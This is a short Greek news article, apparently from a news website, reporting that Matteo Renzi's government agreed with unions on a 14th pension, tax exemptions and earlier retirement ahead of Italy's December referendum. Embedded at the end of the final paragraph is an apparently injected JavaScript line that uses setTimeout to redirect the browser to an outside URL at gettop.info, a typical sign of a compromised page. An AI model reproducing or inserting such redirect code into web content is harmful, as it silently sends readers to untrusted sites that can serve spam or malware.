Ο Ρέντσι υπόσχεται 14η σύνταξη

0
1

 

Ενόψει του δημοψηφίσματος στις 4 Δεκεμβρίου για τις συνταγματικές αλλαγές στην Ιταλία, ο Ματέο Ρέντι προσπαθεί να αυξήσει τη δημοφιλία του και το προφίλ του.

Έπειτα από δύο χρόνια μη αποδοτικών σχέσεων ο Ιταλός πρωθυπουργός είχε επάφές με συνδικαλιστικές ενώσεις ενώ δεν σταματά να επικρίνει τα αποτελέσματα της λιτότητας.

Επιπλέον, σε συνάντηση της ιταλικής κυβέρνησης με τα συνδικάτα αποφασίστηκε ότι θα έχουν δικαίωμα σε 14η σύνταξη όλοι οι συνταξιούχοι με συνολικές απολαβές που δεν ξεπερνούν τα χίλια ευρώ τον μήνα, μία απόφαση πυο αφορά 3.300.000 άτομα. Επίσης, όσοι συνταξιούχοι διαθέτουν ετήσιο εισόδημα μέχρι οκτώ χιλιάδες εκατό ευρώ δεν θα φορολογούνται.

Ο Ιταλός υπουργός εργασίας Τζουλιάνο Πολέττι δήλωσε ότι θα διατεθούν, συνολικά, 6 δισ. ευρώ σε τρία χρόνια για τη στήριξη των συνταξιούχων και των εργαζομένων. «Πρόκειται για ποσό που μπορεί να χρησιμοποιηθεί, χωρίς να χρειάζεται η έγκριση των Βρυξελλών», πρόσθεσε.

Ακόμη η κυβέρνηση Ρέντσι και τα τρία μεγαλύτερα συνδικάτα της χώρας αποφάσισαν ότι όσοι πολίτες άρχισαν να εργάζονται όταν ήταν ανήλικοι, θα μπορούν να βγαίνουν στην σύνταξη πριν από τα 62 τους χρόνια, χωρίς καμία επιβάρυνση ή περικοπές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here